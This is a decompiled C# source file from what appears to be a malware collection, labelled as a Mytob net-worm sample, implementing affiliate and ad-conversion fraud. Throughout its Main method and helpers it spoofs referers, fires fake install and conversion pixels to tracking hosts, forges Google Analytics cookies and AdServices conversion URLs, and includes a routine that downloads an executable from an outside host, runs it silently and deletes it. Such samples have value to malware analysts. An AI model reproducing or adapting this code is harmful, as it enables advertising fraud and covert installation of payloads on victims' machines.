MalwareSourceCode/MSIL/Net-Worm/Win32/M/Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95/AffiliateExecuterNoWin/Program.cs

270 lines
13 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: AffiliateExecuterNoWin.Program
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe
using HTTPAgent;
using Microsoft.Win32;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text.RegularExpressions;
using System.Windows.Forms;
namespace AffiliateExecuterNoWin
{
internal static class Program
{
private static string trackerUrlAndVersion;
[STAThread]
private static void Main(string[] args)
{
string str1 = "http://coolfbskins.info/getitnow";
string appName = "hazidtacp";
bool flag1 = false;
string URL = "http://whatismyipaddress.com/";
bool flag2 = false;
string str2 = "gamewrangler_v2.exe";
string url1 = "http://ie-organic.conduit-download.com/77/295/CT2956077/Downloads/IE/Releases/6.3.5.3/11-04-20-11.19.22.106/" + str2;
Program.trackerUrlAndVersion = "http://www.google-analytics.com/__utm.gif?utmwv=4.9.2";
if (new DateTime(3000, 1, 1) < DateTime.Now)
return;
Agent agent = new Agent();
agent.EmulateBrowser();
if (flag1)
{
string data = DataExtractor.ExtractDataArray(agent.GetURL(URL), "(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b)", "$1")[0];
string savedIps = Program.GetSavedIPs(appName);
if (savedIps.IndexOf(data) >= 0)
return;
Program.SetSavedIPs(appName, savedIps + data + ";");
}
if (!string.IsNullOrEmpty(str1))
agent.Referer = str1;
string data1 = DataExtractor.ExtractDataArray(agent.GetURL("http://bsitm3.com/?a=18003&c=140&s1="), "window.location=\"([^\"]+)", "$1")[0];
agent.GetURL(data1);
string referer = agent.Referer;
agent.GetURL("http://www.facetheme.com/setTheme.php?skinid=100087&redir=http%3A%2F%2Fwww.facetheme.com%2Fdownload%2F");
agent.GetURL("http://app.adurr.com/fb/setTheme.php?skinid=100087&redir=http://www.facetheme.com/download/");
agent.Referer = "";
agent.GetURL("http://www.facetheme.com/install_redirect.php");
string upper = Guid.NewGuid().ToString().ToUpper();
agent.GetURL("http://www.facetheme.com/exit_file.php?installid={" + upper + "}&version=1.0.0");
agent.GetURL("http://www.facetheme.com/installed/{" + upper + "}/1.0.0/");
agent.GetURL("http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft");
agent.GetURL("http://pqsar.com/javascript/8001.js?action=12560");
agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
string url2 = agent.GetURL("http://www.tracklead.net/pixel.track?CID=144152&MerchantReferenceID=");
Program.GetRecursivePixels(agent, url2);
agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
agent.GetURL("http://pqsar.com/pixel/?o=8001&action=12560");
if (!flag2)
return;
if (Directory.Exists("C:\\Users\\Public\\Documents\\"))
str2 = "C:\\Users\\Public\\Documents\\" + str2;
agent.getURL2File(url1, str2);
try
{
Process.Start(str2, "/s").WaitForExit();
System.IO.File.Delete(str2);
}
catch
{
}
}
private static void GetRecursivePixels(Agent agent, string html)
{
html = Regex.Replace(html, "<noscript>.*?</noscript>", "");
List<string> stringList = new List<string>();
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "pt src=\" ?([^\"]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<SCRIPT language=\"javascript\" src=\" ?([^\"]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<IMG src=\\\\?[\"'] ?([^\"'\\\\]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<img src=\\\\?[\"'] ?([^\"'\\\\]+)", "$1"));
stringList.AddRange((IEnumerable<string>) DataExtractor.ExtractDataArray(html, "<iframe[^>]+?src=[\"']([^\"'\\\\]+)", "$1"));
string cid = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_id *= *([0-9]+)", "$1"));
if (cid != "")
{
string clang = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_language\\s*=\\s*\"([^\"]+)", "$1"));
string cformat = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_format\\s*=\\s*\"([^\"]+)", "$1"));
string ccolor = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_color\\s*=\\s*\"([^\"]+)", "$1"));
string clabel = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var google_conversion_label\\s*=\\s*\"([^\"]+)", "$1"));
stringList.Add(Program.createGoogleAdServicesURL(cid, clang, cformat, ccolor, clabel));
}
string offerID = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var filitrac_offer_id\\s*=\\s*'([^']+)", "$1"));
string referece = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(html, "var filitrac_reference\\s*=\\s*'([^']+)", "$1"));
if (offerID != "")
stringList.Add(Program.createFilitracURL(offerID, referece));
string referer = agent.Referer;
foreach (string str in stringList)
{
agent.Referer = referer;
string URL = str.Trim().Replace("&amp;", "&");
string url = agent.GetURL(URL);
Program.GetRecursivePixels(agent, url);
}
}
private static string randomString(int len)
{
string str1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
Random random = new Random();
string str2 = "";
for (int index = 0; index < len; ++index)
str2 += (string) (object) str1[random.Next(str1.Length)];
return str2;
}
private static string GetSavedIPs(string appName)
{
string savedIps = ";";
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\" + appName, false);
if (registryKey != null)
savedIps = registryKey.GetValue("ips").ToString();
}
catch
{
}
return savedIps;
}
private static void SetSavedIPs(string appName, string val)
{
try
{
(Registry.CurrentUser.OpenSubKey("SOFTWARE\\" + appName, true) ?? Registry.CurrentUser.CreateSubKey("SOFTWARE\\" + appName)).SetValue("ips", (object) val);
}
catch
{
}
}
public static void addTrackingCookies(CookieContainer cookies, string domain)
{
Random random = new Random();
Uri uri1 = new Uri("http://" + domain + "/");
Uri uri2 = new Uri("http://utm.trk." + domain + "/");
long totalSeconds = (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds;
string str1 = Program.uHash(domain);
string str2 = str1 + "." + (object) random.Next(int.MaxValue) + "." + (object) totalSeconds + "." + (object) totalSeconds + "." + (object) totalSeconds + ".1";
string str3 = str1 + "." + (object) totalSeconds + ".1.1.utmcsr=ZJxdm025|utmccn=(not+set)|utmcmd=(not+set)";
cookies.Add(uri1, Program.createCookie("__utma", str2, 1800));
cookies.Add(uri1, Program.createCookie("__utmb", str1, 1800));
cookies.Add(uri1, Program.createCookie("__utmc", str1, 1800));
cookies.Add(uri1, Program.createCookie("__utmz", str3, 1800));
cookies.Add(uri2, Program.createCookie("__utma", str2, 1800));
cookies.Add(uri2, Program.createCookie("__utmb", str1, 1800));
cookies.Add(uri2, Program.createCookie("__utmc", str1, 1800));
cookies.Add(uri2, Program.createCookie("__utmz", str3, 1800));
}
private static void BugFix_CookieDomain(CookieContainer cookieContainer, string domain)
{
Hashtable hashtable = (Hashtable) typeof (CookieContainer).InvokeMember("m_domainTable", BindingFlags.Instance | BindingFlags.NonPublic | BindingFlags.GetField, (Binder) null, (object) cookieContainer, new object[0]);
foreach (string key1 in new ArrayList(hashtable.Keys))
{
string str = key1;
if (str == domain)
{
string key2 = "." + str;
hashtable[(object) key2] = hashtable[(object) key1];
hashtable.Remove((object) key1);
}
}
}
public static string uHash(string d)
{
int num1 = 0;
for (int startIndex = d.Length - 1; startIndex >= 0; --startIndex)
{
int num2 = (int) char.Parse(d.Substring(startIndex, 1));
num1 = (num1 << 6 & 268435455) + num2 + (num2 << 14);
int num3;
if ((num3 = num1 & 266338304) != 0)
num1 ^= num3 >> 21;
}
return num1.ToString();
}
public static Cookie createCookie(string name, string value, int timeout) => new Cookie(name, value)
{
Expires = DateTime.Now.AddSeconds((double) timeout)
};
public static string GetTrackingUrlByTemplate(
Agent agent,
string url,
string trackingSearch,
string trackingReplace,
string domain)
{
string title = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmdt=([^&]*)", "$1"));
string hostname = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmhn=([^&]*)", "$1"));
string referer = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmr=([^&]*)", "$1"));
string tracking = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmp=([^&]*)", "$1"));
string utmac = Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "&utmac=([^&]*)", "$1"));
bool addutmcn = !(Program.FirstOrEmpty(DataExtractor.ExtractDataArray(url, "(&utmcn=1)", "$1")) == "");
string URL = Program.createTrackingUrl(title, hostname, referer, tracking, addutmcn, utmac, domain);
if (!string.IsNullOrEmpty(trackingSearch) || !string.IsNullOrEmpty(trackingReplace))
URL = URL.Replace(trackingSearch, trackingReplace);
return agent.GetURL(URL);
}
public static string FirstOrEmpty(string[] arr) => arr.Length > 0 ? arr[0] : "";
public static string sGetTrackingUrl(
Agent agent,
string title,
string hostname,
string referer,
string tracking,
bool addutmcn)
{
return agent.GetURL(Program.createTrackingUrl(title, hostname, referer, tracking, addutmcn, "", ""));
}
public static string createTrackingUrl(
string title,
string hostname,
string referer,
string tracking,
bool addutmcn,
string utmac,
string domain)
{
Random random = new Random();
string str1 = Screen.PrimaryScreen.Bounds.Width.ToString() + "x" + (object) Screen.PrimaryScreen.Bounds.Height;
long totalSeconds = (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds;
string str2 = Program.uHash(domain);
string str3 = "__utma%3D" + (str2 + "." + (object) random.Next(int.MaxValue) + "." + (object) totalSeconds + "." + (object) totalSeconds + "." + (object) totalSeconds + ".1") + "%3B%2B__utmz%3D" + (str2 + "." + (object) totalSeconds + ".1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B");
return Program.trackerUrlAndVersion + "&utms=1&utmn=" + (object) random.Next(int.MaxValue) + "&utmhn=" + hostname + "&utmcs=utf-8&utmsr=" + str1 + "&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=10.2%20r159" + (title == "" ? (object) "" : (object) ("&utmdt=" + title)) + "&utmhid=" + (object) random.Next(int.MaxValue) + (referer == "" ? (object) "" : (object) ("&utmr=" + referer)) + (addutmcn ? (object) "&utmcn=1" : (object) "") + "&utmp=" + tracking + "&utmac=" + utmac + "&utmcc=" + str3 + "&utmu=q~";
}
private static string createFilitracURL(string offerID, string referece) => "http://www.filitrac.com/Lead.aspx?pid=" + offerID + "&ref=" + referece + "&iframe=1";
private static string createGoogleAdServicesURL(
string cid,
string clang,
string cformat,
string ccolor,
string clabel)
{
long num = 1000L * (long) (DateTime.Now.ToUniversalTime() - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalSeconds + (long) new Random().Next(1000);
string[] strArray = clang.Split('_');
string str1 = strArray[0];
string str2 = strArray.Length <= 1 ? "" : strArray[1];
TimeSpan timeSpan = DateTime.Now - DateTime.UtcNow;
return "http://www.googleadservices.com/pagead/conversion/" + cid + "/?random=" + (object) num + "&cv=6&fst=" + (object) num + "&num=1&fmt=" + cformat + "&label=" + clabel + "&bg=" + ccolor + "&hl=" + str1 + "&gl=" + str2 + "&guid=ON&u_h=" + (object) Screen.PrimaryScreen.Bounds.Height + "&u_w=" + (object) Screen.PrimaryScreen.Bounds.Width + "&u_ah=" + (object) (Screen.PrimaryScreen.Bounds.Height - 30) + "&u_aw=" + (object) Screen.PrimaryScreen.Bounds.Width + "&u_cd=32&u_his=2&u_tz=" + (object) (int) (DateTime.Now - DateTime.UtcNow).TotalMinutes + "&u_nplug=0&u_nmime=0&url=http%3A//www.zwinky.com/dl/successPixels.jhtml";
}
}
}